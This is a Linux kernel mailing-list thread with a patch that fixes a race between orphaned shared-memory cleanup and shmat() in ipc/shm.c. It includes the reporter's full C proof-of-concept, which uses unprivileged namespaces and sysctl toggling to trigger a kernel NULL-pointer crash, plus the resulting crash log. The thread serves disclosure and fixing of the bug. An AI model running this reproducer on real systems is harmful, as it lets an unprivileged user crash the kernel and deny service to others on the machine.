ipc/shm.c | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-)
shm_try_destroy_orphaned() reads shm_nattch via shm_may_destroy()
without holding the per-object spinlock, relying on rwsem alone for
synchronization. However, do_shmat() modifies shm_nattch under the
per-object spinlock (not rwsem), creating a TOCTOU race:
  CPU 0 (do_shmat)              CPU 1 (shm_try_destroy_orphaned)
  ipc_lock_object()
  shm_nattch++ (0 -> 1)
  ipc_unlock_object()
                                shm_may_destroy() -> reads stale nattch==0
                                shm_lock_by_ptr()
                                shm_destroy() // nattch is actually 1!
The segment is destroyed while do_shmat() has already incremented
shm_nattch and is proceeding with the mmap setup. When do_shmat()
later reaches out_nattch, shm_lock() returns ERR_PTR (the IDR entry
was removed by shm_destroy) and the code dereferences it without an
IS_ERR() check, causing a null-ptr-deref crash:
BUG: kernel NULL pointer dereference, address: 0000000000000072
RIP: 0010:do_shmat (ipc/shm.c:1678)
Call Trace:
__x64_sys_shmat (ipc/shm.c:1699 ipc/shm.c:1693 ipc/shm.c:1693)
do_syscall_64 (arch/x86/entry/syscall_64.c:94)
[...]
Fix by taking the object lock before checking shm_may_destroy() in
shm_try_destroy_orphaned(), so the check sees the up-to-date value
of shm_nattch.
Fixes: 4c677e2eefdb ("shm: optimize locking and ipc_namespace getting")
Reported-by: Weiming Shi <bestswngs@gmail.com>
Signed-off-by: Xiang Mei <xmei5@asu.edu>
---
ipc/shm.c | 13 +++++++------
1 file changed, 7 insertions(+), 6 deletions(-)
diff --git a/ipc/shm.c b/ipc/shm.c
index a95dae447707..50f9aa7ff33a 100644
--- a/ipc/shm.c
+++ b/ipc/shm.c
@@ -416,17 +416,18 @@ static int shm_try_destroy_orphaned(int id, void *p, void *data)
/*
* We want to destroy segments without users and with already
- * exit'ed originating process.
- *
- * As shp->* are changed under rwsem, it's safe to skip shp locking.
+ * exit'ed originating process. Take the object lock before
+ * checking shm_may_destroy() since shm_nattch can be modified
+ * under the object lock alone (e.g. by do_shmat).
*/
if (!list_empty(&shp->shm_clist))
return 0;
- if (shm_may_destroy(shp)) {
- shm_lock_by_ptr(shp);
+ shm_lock_by_ptr(shp);
+ if (shm_may_destroy(shp))
shm_destroy(ns, shp);
- }
+ else
+ shm_unlock(shp);
return 0;
}
--
2.43.0
On Sat, Mar 28, 2026 at 06:36:46PM -0700, Xiang Mei wrote:
> shm_try_destroy_orphaned() reads shm_nattch via shm_may_destroy()
> without holding the per-object spinlock, relying on rwsem alone for
> synchronization. However, do_shmat() modifies shm_nattch under the
> per-object spinlock (not rwsem), creating a TOCTOU race:
>
>   CPU 0 (do_shmat)              CPU 1 (shm_try_destroy_orphaned)
>   ipc_lock_object()
>   shm_nattch++ (0 -> 1)
>   ipc_unlock_object()
>                                 shm_may_destroy() -> reads stale nattch==0
>                                 shm_lock_by_ptr()
>                                 shm_destroy() // nattch is actually 1!
>
> The segment is destroyed while do_shmat() has already incremented
> shm_nattch and is proceeding with the mmap setup. When do_shmat()
> later reaches out_nattch, shm_lock() returns ERR_PTR (the IDR entry
> was removed by shm_destroy) and the code dereferences it without an
> IS_ERR() check, causing a null-ptr-deref crash:
>
> BUG: kernel NULL pointer dereference, address: 0000000000000072
> RIP: 0010:do_shmat (ipc/shm.c:1678)
> Call Trace:
> __x64_sys_shmat (ipc/shm.c:1699 ipc/shm.c:1693 ipc/shm.c:1693)
> do_syscall_64 (arch/x86/entry/syscall_64.c:94)
> [...]
>
> Fix by taking the object lock before checking shm_may_destroy() in
> shm_try_destroy_orphaned(), so the check sees the up-to-date value
> of shm_nattch.
>
> Fixes: 4c677e2eefdb ("shm: optimize locking and ipc_namespace getting")
> Reported-by: Weiming Shi <bestswngs@gmail.com>
> Signed-off-by: Xiang Mei <xmei5@asu.edu>
> ---
> ipc/shm.c | 13 +++++++------
> 1 file changed, 7 insertions(+), 6 deletions(-)
>
> diff --git a/ipc/shm.c b/ipc/shm.c
> index a95dae447707..50f9aa7ff33a 100644
> --- a/ipc/shm.c
> +++ b/ipc/shm.c
> @@ -416,17 +416,18 @@ static int shm_try_destroy_orphaned(int id, void *p, void *data)
>
> /*
> * We want to destroy segments without users and with already
> - * exit'ed originating process.
> - *
> - * As shp->* are changed under rwsem, it's safe to skip shp locking.
> + * exit'ed originating process. Take the object lock before
> + * checking shm_may_destroy() since shm_nattch can be modified
> + * under the object lock alone (e.g. by do_shmat).
> */
> if (!list_empty(&shp->shm_clist))
> return 0;
>
> - if (shm_may_destroy(shp)) {
> - shm_lock_by_ptr(shp);
> + shm_lock_by_ptr(shp);
> + if (shm_may_destroy(shp))
> shm_destroy(ns, shp);
> - }
> + else
> + shm_unlock(shp);
> return 0;
> }
>
> --
> 2.43.0
>
Thanks for your attention to this bug. I'll attach the required information
to help you reproduce the bug:
PoC Source Code:
```c
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/wait.h>
/* Size in bytes requested for every shared memory segment. */
#define SHM_SIZE 4096
/* Upper bound on successful create/attach/remove rounds per worker thread. */
#define NUM_ITERATIONS 500000
/*
 * Shutdown flag shared by all threads: set to 1 by main(), polled by the
 * toggle and worker loops. It is atomic because it is read and written
 * from different threads without any other synchronisation; volatile
 * alone does not make that well-defined in C11.
 */
static atomic_int stop = 0;
/*
 * Best-effort write of a short string to a procfs file.
 * Failures are reported on stderr but never abort the program, so the
 * caller keeps its original "try and carry on" behaviour.
 */
static void write_proc_file(const char *path, const char *text) {
    int fd = open(path, O_WRONLY);
    if (fd < 0) {
        perror(path);
        return;
    }

    size_t len = strlen(text);
    ssize_t written = write(fd, text, len);
    if (written < 0)
        perror(path);
    else if ((size_t)written != len)
        fprintf(stderr, "%s: short write\n", path);

    close(fd);
}

/*
 * Set up an unprivileged namespace: NEWUSER + NEWIPC.
 *
 * Unshares into a new user and IPC namespace, then maps id 0 inside the
 * namespace to the caller's original uid/gid. Exits with status 1 if
 * unshare() fails; the procfs writes are best-effort.
 */
static void setup_ns(void) {
    /* Read the outer ids first: they form the right-hand side of the maps. */
    uid_t uid = getuid();
    gid_t gid = getgid();
    char map[64];

    if (unshare(CLONE_NEWUSER | CLONE_NEWIPC) < 0) {
        perror("unshare");
        exit(1);
    }

    /* Written before gid_map; see user_namespaces(7) on "setgroups". */
    write_proc_file("/proc/self/setgroups", "deny");

    /* uid_t/gid_t are unsigned: format them as such so large ids survive. */
    snprintf(map, sizeof(map), "0 %u 1", (unsigned int)uid);
    write_proc_file("/proc/self/uid_map", map);

    snprintf(map, sizeof(map), "0 %u 1", (unsigned int)gid);
    write_proc_file("/proc/self/gid_map", map);
}
/*
 * Thread body: until the global stop flag is set, repeatedly write "1"
 * and then "0" to /proc/sys/kernel/shm_rmid_forced. A failed open is
 * skipped silently. The argument is unused; always returns NULL.
 *
 * NOTE(review): presumably each write of "1" makes the kernel scan for
 * orphaned segments, which is the path the patch above changes - confirm
 * against the sysctl handler.
 */
void *toggle_rmid_forced(void *arg) {
    static const char sysctl_path[] = "/proc/sys/kernel/shm_rmid_forced";
    static const char settings[] = { '1', '0' };

    (void)arg;

    while (!stop) {
        /* One full on/off cycle per check of the stop flag. */
        for (size_t i = 0; i < sizeof(settings); i++) {
            int fd = open(sysctl_path, O_WRONLY);
            if (fd < 0)
                continue;
            write(fd, &settings[i], 1);
            close(fd);
        }
    }

    return NULL;
}
/*
 * Create a shared memory segment whose creating process has already
 * exited.
 *
 * A forked child creates an IPC_PRIVATE segment of SHM_SIZE bytes, sends
 * the id (or -1 on failure) to the parent over a pipe and exits without
 * removing the segment. The parent reaps the child before returning.
 *
 * Returns the segment id, or -1 if pipe(), fork() or the child's
 * shmget() failed.
 */
int create_orphaned_shm(void) {
    int chan[2];
    int result = -1; /* stays -1 if nothing is read from the pipe */

    if (pipe(chan) < 0)
        return -1;

    pid_t child = fork();
    if (child < 0) {
        close(chan[0]);
        close(chan[1]);
        return -1;
    }

    if (child == 0) {
        /* Child: create the segment, report its id, then exit at once. */
        close(chan[0]);
        int id = shmget(IPC_PRIVATE, SHM_SIZE, IPC_CREAT | 0666);
        int report = (id < 0) ? -1 : id;
        write(chan[1], &report, sizeof(report));
        close(chan[1]);
        _exit(0);
    }

    /* Parent: collect the id, then wait so the creator is really gone. */
    close(chan[1]);
    read(chan[0], &result, sizeof(result));
    close(chan[0]);
    waitpid(child, NULL, 0);

    return result;
}
/*
 * Thread body: repeatedly create an orphaned segment, attach it, detach
 * it if the attach succeeded, and mark it for removal. Runs until the
 * global stop flag is set or NUM_ITERATIONS rounds have completed.
 * The argument is unused; always returns NULL.
 *
 * NOTE(review): a failed create_orphaned_shm() only sleeps 100us and does
 * not advance the round counter, so persistent failures keep this loop
 * running until stop is set.
 */
void *shmat_worker(void *arg) {
    int completed = 0;

    (void)arg;

    while (!stop && completed < NUM_ITERATIONS) {
        int id = create_orphaned_shm();

        if (id >= 0) {
            void *mapping = shmat(id, NULL, 0);
            if (mapping != (void *)-1)
                shmdt(mapping);
            shmctl(id, IPC_RMID, NULL);
            completed++;
        } else {
            usleep(100);
        }
    }

    return NULL;
}
#define NUM_WORKERS 4
#define NUM_TOGGLERS 2

/*
 * Entry point of the reproducer.
 *
 * Enters the new namespaces, starts NUM_TOGGLERS threads flipping the
 * shm_rmid_forced sysctl and NUM_WORKERS threads cycling orphaned
 * segments, waits for the workers, then sets the stop flag and waits for
 * the togglers.
 *
 * Returns 0 on normal completion, 1 if a thread could not be created.
 * Command-line arguments are ignored.
 */
int main(int argc, char *argv[]) {
    pthread_t togglers[NUM_TOGGLERS];
    pthread_t workers[NUM_WORKERS];
    int rc;

    (void)argc;
    (void)argv;

    setup_ns();

    /*
     * pthread_create() returns an error number instead of setting errno.
     * Bail out on failure so we never join an uninitialised pthread_t;
     * returning from main() ends any threads already started.
     */
    for (int i = 0; i < NUM_TOGGLERS; i++) {
        rc = pthread_create(&togglers[i], NULL, toggle_rmid_forced, NULL);
        if (rc != 0) {
            fprintf(stderr, "pthread_create (toggle %d): %s\n", i, strerror(rc));
            return 1;
        }
    }

    for (int i = 0; i < NUM_WORKERS; i++) {
        rc = pthread_create(&workers[i], NULL, shmat_worker, NULL);
        if (rc != 0) {
            fprintf(stderr, "pthread_create (worker %d): %s\n", i, strerror(rc));
            return 1;
        }
    }

    for (int i = 0; i < NUM_WORKERS; i++)
        pthread_join(workers[i], NULL);

    /* Workers are done; only now tell the toggle threads to finish. */
    stop = 1;

    for (int i = 0; i < NUM_TOGGLERS; i++)
        pthread_join(togglers[i], NULL);

    return 0;
}
```
Intended Crash:
```
[ 1.310476] Oops: general protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] SMP KASAN NOPTI
[ 1.310969] KASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]
[ 1.311301] CPU: 0 UID: 1000 PID: 153 Comm: exploit Not tainted 7.0.0-rc5+ #6 PREEMPTLAZY
[ 1.311631] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014
[ 1.312087] RIP: 0010:do_shmat+0x699/0xee0
[ 1.312279] Code: 48 8b 4c 24 08 41 80 7c 24 04 00 0f 85 1b 01 00 00 49 8d bc 24 88 00 00 00 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 26 06 00 00 49 83 ac 24 88 00 00 00 01 0f 85 b7
[ 1.313011] RSP: 0018:ffff88800f1b7da0 EFLAGS: 00010202
[ 1.313243] RAX: dffffc0000000000 RBX: ffff88800e5771c8 RCX: ffffffffffffffea
[ 1.313539] RDX: 000000000000000e RSI: ffffed1001caee3f RDI: 0000000000000072
[ 1.313844] RBP: 1ffff11001e36fbe R08: ffff88800e5771f8 R09: 0000000000000040
[ 1.314155] R10: ffff88800e5771d7 R11: 000000000bbb6319 R12: ffffffffffffffea
[ 1.314478] R13: ffff88800dd4ee50 R14: ffff88800f182b58 R15: ffff888013c4c000
[ 1.314782] FS: 00007ad9ea0716c0(0000) GS:ffff888178099000(0000) knlGS:0000000000000000
[ 1.315162] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1.315442] CR2: 00000000004ca868 CR3: 000000000f0fa005 CR4: 0000000000772ef0
[ 1.315783] PKRU: 55555554
[ 1.315917] Call Trace:
[ 1.316035] <TASK>
[ 1.316163] ? __pfx_do_shmat+0x10/0x10
[ 1.316339] __x64_sys_shmat+0xd4/0x150
[ 1.316515] ? file_close_fd_locked+0x178/0x2a0
[ 1.316714] ? __pfx___x64_sys_shmat+0x10/0x10
[ 1.316925] do_syscall_64+0xc3/0x6e0
[ 1.317097] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 1.317349] RIP: 0033:0x4208ab
```
Please let me know if you have any questions about the patch or the PoC.
Thanks,
Xiang
© 2016 - 2026 Red Hat, Inc.